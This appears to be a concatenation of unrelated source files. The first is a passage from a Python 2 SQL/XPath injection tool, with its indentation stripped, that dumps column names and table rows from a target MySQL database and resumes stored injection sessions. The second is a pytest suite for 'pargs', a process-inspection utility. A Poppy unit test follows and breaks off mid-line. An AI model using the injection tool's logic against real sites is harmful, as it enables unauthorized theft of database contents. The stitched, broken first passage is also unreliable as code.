_nameList = "columns for table '%s' in database '%s'" % (_tblName ,_dbName)
_listPayload = [COL_COUNT_FROM_TBL, COL_DUMP_FROM_TBL]
else:
			# Dump columns using default query (where table_Schema != information_Schema)
pass
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist, __ = self.XpathInject(_flag, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(__dlist))
self._logs += "[%s columns]:\n" % (len(__dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in __dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
colsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
_flag = False
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(_dlist))
self._logs += "[%s columns]:\n" % (len(_dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in _dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (colsCount)
try:
cols_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=colsCount, Dbname=_dbName, TblName=_tblName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(_dlist))
self._logs += "[%s columns]:\n" % (len(_dlist))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in _dlist:
_columns.add_row([col])
print compat_color.fg + compat_color.sb + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
if len(cols_names) == int(colsCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fw + compat_color.sd + "[%s columns]:" % (colsCount)
self._logs += "[%s columns]:\n" % (colsCount)
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in cols_names:
_columns.add_row([col])
print compat_color.fw + compat_color.sd + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
else:
_init = len(cols_names)
_total = int(colsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for col in cols_names:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (col)
_ch = ','.join(map(str, cols_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
cols_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (_tblName)
self._logs += "Table: %s\n" % (_tblName)
print compat_color.fg + compat_color.sb + "[%s columns]:" % (len(cols_names))
self._logs += "[%s columns]:\n" % (len(cols_names))
_columns = compat_prettytable(["Column"])
_columns.align = "l"
_columns.header = True
for col in cols_names:
_columns.add_row([col])
print compat_color.fw + compat_color.sd + "%s" % (_columns)
self._logs += "%s\n" % (_columns)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Dumps(self, Dbname=None, TblName=None, ColList=None):
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname and TblName and ColList:
_dbName = Dbname
_tblName = "`%s`" % (TblName)
_colN = "%s" % (ColList if not " " in ColList else (ColList.replace(" ","")))
_colsDumpList = ("`%s`" % (ColList.replace(",","`,`") if not " " in ColList else ((ColList.replace(" ","")).replace(",", "`,`")))).split(",")
_colDtc = "`%s_%sDataCount` TEXT" % (Dbname, TblName)
_colDts = "`%s_%sDumps` TEXT" % (Dbname, TblName)
_colList = [self.colDtp, _colDtc, _colDts]
_nameList = "entries of column(s) '%s' for table '%s' in database '%s'" % (_colN,_tblName ,_dbName)
_listPayload = [REC_COUNT_FROM_TBL, REC_DUMP_FROM_TBL]
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist = self.XpathInject(_flag, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName, ColList=_colsDumpList)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (__dlist)
self._logs += "%s\n" % (__dlist)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
                    req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name == "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
dataCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
_flag = False
_dlist = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName, TblName=_tblName, ColsList=_colsDumpList)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (_dlist)
self._logs += "%s\n" % (_dlist)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (dataCount)
try:
data_dumped = sqlite.SessionDumpShow(self._PathSession, _tblName, ColList)
except Exception as e:
_flag = True
_dlist = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=dataCount, Dbname=_dbName, TblName=_tblName, ColsList=_colsDumpList)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
print compat_color.fg + compat_color.sb + "%s" % (_dlist)
self._logs += "%s\n" % (_dlist)
else:
if len(data_dumped) == int(dataCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
cursor = sqlite.ShowPrettySession(self._PathSession, _tblName, Cols=ColList)
_tabulate = compat_cursor(cursor)
sqlite.ShowPrettySession(self._PathSession, _tblName, flag=False,Cols=ColList)
print compat_color.fw + compat_color.sd + "%s" % (_tabulate)
self._logs += "%s\n" % (_tabulate)
else:
_init = len(data_dumped)
_total = int(dataCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for _col in data_dumped:
for _d in _col:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (_d)
_,_ = self.XpathDataDump(_init, _total, _retVal, Table=_tblName, Dbname=_dbName, Coltodump=_colsDumpList, flag=False)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "Table: %s" % (TblName)
self._logs += "Table: %s\n" % (TblName)
cursor = sqlite.ShowPrettySession(self._PathSession, _tblName, Cols=ColList)
_tabulate = compat_cursor(cursor)
sqlite.ShowPrettySession(self._PathSession, _tblName, flag=False,Cols=ColList)
print compat_color.fg + compat_color.sb + "%s" % (_tabulate)
self._logs += "%s\n" % (_tabulate)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = "" | gpl-3.0 | 6,825,923,647,074,689,000 | 42.634264 | 187 | 0.599463 | false |
gsauthof/utility | test/pargs.py | 1 | 15714 | #!/usr/bin/env python3
#
# pargs unittests
#
# 2017, Georg Sauthoff <[email protected]>
#
# SPDX-License-Identifier: GPL-3.0-or-later
import glob
import os
import pytest
import re
import shutil
import subprocess
import tempfile
src_dir = os.getenv('src_dir', os.getcwd()+'/..')
test_dir = src_dir + '/test/in'
pargs = os.getenv('pargs', './pargs')
snooze32 = os.getenv('snooze32', './snooze32')
snooze = os.getenv('snooze', './snooze')
busy_snooze = os.getenv('busy_snooze', './busy_snooze')
simple_env = dict(x for x in os.environ.items()
if '\n' not in x[1] and '\r' not in x[1])
def runs_inside_docker():
# since ptrace is now enabled at various places we don't
# need to check anymore ...
# .travis.yml (docker_flags)
# ci/travis/linux/before_install.sh (enable_ptrace())
return False
with open('/proc/1/cgroup') as f:
e = re.compile('[0-9]+:pids:/docker/')
for line in f:
if e.match(line):
return True
return False
skip_in_container = pytest.mark.skipif(runs_inside_docker(),
reason='non-docker environment required')
def root_proc_count():
p = subprocess.run(['pgrep', '-c', '-u', 'root'], stdout=subprocess.PIPE,
universal_newlines=True)
return int(p.stdout)
skip_if_isolated = pytest.mark.skipif(root_proc_count() == 0,
reason='non-docker environment required')
def test_noargs():
p = subprocess.run([pargs], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
assert not p.stdout
assert p.returncode == 2
assert len(p.stderr) > 10
assert 'Usage: ' in p.stderr
assert '-a ' in p.stderr
assert '-e ' in p.stderr
@pytest.mark.parametrize("hstr", ['-h', '--help'])
def test_help(hstr):
p = subprocess.run([pargs, hstr], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert not p.stderr
assert p.returncode == 0
assert len(p.stdout) > 10
assert 'Usage: ' in p.stdout
assert '-a ' in p.stdout
assert '-e ' in p.stdout
@pytest.mark.parametrize("ostr", ['-z', '--hel', '--helper', '--foo'])
def test_unk(ostr):
p = subprocess.run([pargs, ostr, '123'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert 'Unknown' in p.stderr
assert ostr in p.stderr
@pytest.mark.parametrize("ostr", ['-x', '-e'])
def test_cmdline_combi(ostr):
p = subprocess.run([pargs, '-l', ostr, '123'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert 'incompatible' in p.stderr
assert ostr in p.stderr
@pytest.mark.parametrize("opts", [[], ['-a'], ['--'], ['-a', '--'] ])
def test_argv(opts):
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs] + opts + [str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '''{0}: {1} 1 0
argv[0]: {1}
argv[1]: 1
argv[2]: 0
'''.format(c.pid, snooze)
c.wait()
def test_envp():
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs, '-e', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert ls[1].startswith('envp[0]: ')
assert ls[-1].startswith('envp[{}]: '.format(len(ls)-2))
assert re.search('\nenvp\[[0-9]+\]: PATH={}\n'.format(os.environ['PATH']), p.stdout)
c.wait()
@pytest.mark.parametrize("opts", [ ['-ea'], ['-a', '-e'] ])
def test_argv_envp(opts):
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs] + opts + [ str(c.pid)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert ls[1] == 'argv[0]: {}'.format(snooze)
assert ls[3] == 'argv[2]: 0'
assert ls[4] == ''
assert ls[5].startswith('envp[0]: ')
assert ls[-1].startswith('envp[{}]: '.format(len(ls) - 2 - 3 - 1))
assert re.search('\nenvp\[[0-9]+\]: PATH={}\n'.format(os.environ['PATH']), p.stdout)
c.wait()
def test_cmdline():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs, '-l', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '{} 1 0\n'.format(snooze)
c.wait()
@skip_in_container
def test_auxv():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
v = '\nAT_PAGESZ 0x{:016x} {} KiB\n'.format(os.sysconf('SC_PAGESIZE'),
int(os.sysconf('SC_PAGESIZE')/1024))
assert v in p.stdout
c.wait()
@skip_in_container
@pytest.mark.parametrize("opts", [ ['-eax'], ['-xea'], ['-a', '-x', '-e' ] ])
def test_eax(opts):
c = subprocess.Popen([snooze, '1', '0'], env=simple_env)
assert c.pid
p = subprocess.run([pargs] + opts + [ str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert sum(not x for x in ls) == 2
assert '\nAT_PLATFORM ' in p.stdout
assert '\nargv[0]: ' in p.stdout
assert '\nenvp[0]: ' in p.stdout
assert p.stdout.find('\nargv[0]') < p.stdout.find('\nenvp[0]')
assert p.stdout.find('\nenvp[0]') < p.stdout.find('\nAT_PLATFORM ')
c.wait()
def test_multiple():
c = subprocess.Popen([snooze, '1', '0'])
assert c.pid
d = subprocess.Popen([snooze, '1', '1'])
assert d.pid
p = subprocess.run([pargs, str(c.pid), str(d.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert len(ls) == 9
assert ls[0] == '''{}: {} 1 0'''.format(c.pid, snooze)
assert not ls[4]
assert ls[5] == '''{}: {} 1 1'''.format(d.pid, snooze)
assert ls[-1] == 'argv[2]: 1'
c.wait()
d.wait()
@skip_in_container
@pytest.mark.parametrize('width', ['', '32'])
def test_auxv32(width):
c = subprocess.Popen([snooze32, '1', '42'])
assert c.pid
p = subprocess.run([pargs + width, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 42'''.format(c.pid, snooze32)
assert sum(not x for x in ls) == 0
assert '\nAT_PLATFORM ' in p.stdout
v = '\nAT_UID 0x{0:016x} {0}\n'.format(os.getuid())
assert v in p.stdout
c.wait()
def test_no_such_pid():
c = subprocess.Popen([snooze, '0'])
assert c.pid
c.wait()
p = subprocess.run([pargs, str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '{}: '.format(c.pid)
assert p.stderr == 'No such file or directory\n'
@skip_if_isolated
@pytest.mark.parametrize("opts", [ [ '-e'], ['-x'] ])
def test_no_perm(opts):
q = subprocess.run(['pgrep', '-u', 'root', '^writeback$'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True,
check=True)
pid = int(q.stdout)
p = subprocess.run([pargs] + opts + [str(pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '{}: \n'.format(pid)
assert p.stderr == 'Permission denied\n'
@skip_in_container
def test_auxv_verbose():
c = subprocess.Popen([snooze, '1', '42'])
assert c.pid
p = subprocess.run([pargs, '-v', '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 42'''.format(c.pid, snooze)
v = '\nAT_EUID 0x{0:016x} {0} (Effective uid)\n'.format(os.geteuid())
assert v in p.stdout
c.wait()
def test_too_long():
p = subprocess.run([pargs, '123456789012345678901'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 2
assert not p.stdout
assert p.stderr == 'PID is too long.\n'
def test_long_enough():
p = subprocess.run([pargs, '12345678901234567890'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 1
assert p.stdout == '12345678901234567890: '
assert p.stderr == 'No such file or directory\n'
@skip_in_container
@pytest.mark.parametrize("opts", [ [], ['-s'] ])
def test_proc_mem(opts):
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x'] + opts + [str(c.pid)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 fo o'''.format(c.pid, busy_snooze)
l = [x for x in ls if x.startswith('AT_EXECFN')][0]
assert l.endswith(busy_snooze)
c.wait()
@skip_in_container
def test_proc_mem_rand():
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == '''{}: {} 1 fo o'''.format(c.pid, busy_snooze)
l = [x for x in ls if x.startswith('AT_RANDOM')][0]
assert re.match(
'AT_RANDOM 0x[0-9a-f]{16} [0-9a-f]{2}( [0-9a-f]{2}){15}', l)
c.wait()
@skip_in_container
def test_hwcap():
c = subprocess.Popen([busy_snooze, '1', 'fo o'], stdout=subprocess.DEVNULL)
assert c.pid
p = subprocess.run([pargs, '-x', str(c.pid)], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
l = [x for x in ls if x.startswith('AT_HWCAP')][0]
assert re.match(
'AT_HWCAP 0x[0-9a-f]{16} [0-9a-z]+( \| [0-9a-z]+)*', l)
c.wait()
@pytest.fixture(scope='module', params=[snooze, snooze32])
def mk_core_file(request):
exe = request.param
with tempfile.TemporaryDirectory() as d:
c = subprocess.Popen([exe, '10', 'hello', 'world'], env=simple_env)
core = '{}/core'.format(d)
subprocess.check_output(['gcore', '-o', core, str(c.pid)])
c.terminate()
c.wait()
yield (exe, core + '.{}'.format(c.pid))
def d_core_file(core_xz):
with tempfile.TemporaryDirectory() as d:
shutil.copy(core_xz, d)
b = os.path.basename(core_xz)
subprocess.check_output(['xz', '-d', b], cwd=d)
b = b[:-3]
exe = './' + b[5:b.find('.', 5)]
core = d + '/' + b
yield (exe, core)
@pytest.fixture(scope='module', params=glob.glob(test_dir + '/core.*.xz'))
def decompress_core_file(request):
core_xz = request.param
yield from d_core_file(core_xz)
# to test a specific core file instance
#
#@pytest.fixture(scope='module')
#def decompress_xyz_core(request):
# core_xz = test_dir + '/xyz.core'
# yield from d_core_file(core_xz)
def check_core(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
assert p.stdout == '''core '{0:}' of {1:}: {2:} 10 hello world
argv[0]: {2:}
argv[1]: 10
argv[2]: hello
argv[3]: world
'''.format(core_file, pid, exe)
@skip_in_container
def test_core(mk_core_file):
    check_core(mk_core_file)
def test_stored_core(decompress_core_file):
    check_core(decompress_core_file)
# to test a specific core file instance
#
#def test_store_core_xyz(decompress_xyz_core):
# exe, core_file = decompress_sectionless_core
# pid = core_file[core_file.rfind('.')+1:]
# p = subprocess.run([pargs, core_file], stdout=subprocess.PIPE,
# stderr=subprocess.PIPE, universal_newlines=True)
# assert p.returncode == 1
# assert not p.stdout
# assert p.stderr == 'some error'
@skip_in_container
def test_core_envp(mk_core_file):
exe, core_file = mk_core_file
p = subprocess.run([pargs, '-e', core_file], stdout=subprocess.PIPE,
env=simple_env, stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
for key, val in os.environ.items():
if 'PYTEST' in key:
continue
if '\n' in val or '\r' in val:
continue
assert ': {}={}\n'.format(key, val) in p.stdout
def get_page_size(core_file):
l = core_file.split('.')
if len(l) < 3:
return os.sysconf('SC_PAGESIZE')
else:
if l[2] == 'ppc64':
return 64*1024
else:
return 4*1024
def check_core_auxv(cmd, mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([cmd, '-x', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == "core '{0:}' of {1:}: {2:} 10 hello world".format(
core_file, pid, exe)
l = [x for x in ls if x.startswith('AT_PAGESZ') ][0]
page_size = get_page_size(core_file)
assert l == 'AT_PAGESZ 0x{:016x} {} KiB'.format(
page_size, int(page_size/1024))
l = [x for x in ls if x.startswith('AT_EXECFN')][0]
assert l[l.rfind(' ')+1:] == exe
@skip_in_container
def test_core_auxv(mk_core_file):
check_core_auxv(pargs, mk_core_file)
@pytest.mark.parametrize('width', ['', '32'])
def test_stored_core_auxv(width, decompress_core_file):
check_core_auxv(pargs + width, decompress_core_file)
def check_core_auxv_random(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, '-x', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
l = [x for x in ls if x.startswith('AT_RANDOM')][0]
assert re.match(
'AT_RANDOM 0x[0-9a-f]{16} [0-9a-f]{2}( [0-9a-f]{2}){15}', l)
@skip_in_container
def test_core_auxv_random(mk_core_file):
check_core_auxv_random(mk_core_file)
def test_stored_core_auxv_random(decompress_core_file):
check_core_auxv_random(decompress_core_file)
def check_core_all(mk_core_file):
exe, core_file = mk_core_file
pid = core_file[core_file.rfind('.')+1:]
p = subprocess.run([pargs, '-aexv', core_file], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
assert p.returncode == 0
assert not p.stderr
ls = p.stdout.splitlines()
assert ls[0] == "core '{0:}' of {1:}: {2:} 10 hello world".format(
core_file, pid, exe)
assert sum(not x for x in ls) == 2
assert '\nenvp[0]: ' in p.stdout
assert '\nenvp[1]: ' in p.stdout
assert ls[3] == 'argv[2]: hello'
l = [x for x in ls if x.startswith('AT_EGID')][0]
assert l.endswith('(Effective gid)')
@skip_in_container
def test_core_all(mk_core_file):
check_core_all(mk_core_file)
def test_stored_core_all(decompress_core_file):
check_core_all(decompress_core_file)
# XXX test: PPC big-endian core, add the core files
| gpl-3.0 | 3,478,138,980,019,795,000 | 32.292373 | 86 | 0.640003 | false |
stackforge/poppy | tests/unit/provider/akamai/test_mod_san_queue.py | 2 | 5168 | # Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
from oslo_config import cfg
from zake import fake_client
from poppy.provider.akamai.mod_san_queue import zookeeper_queue
from tests.unit import base
AKAMAI_OPTIONS = [
# queue backend configs
cfg.StrOpt(
'queue_backend_type',
help='SAN Cert Queueing backend'),
cfg.ListOpt('queue_backend_host', default=['localhost'],
help='default queue backend server hosts'),
cfg.IntOpt('queue_backend_port', default=2181, help='default'
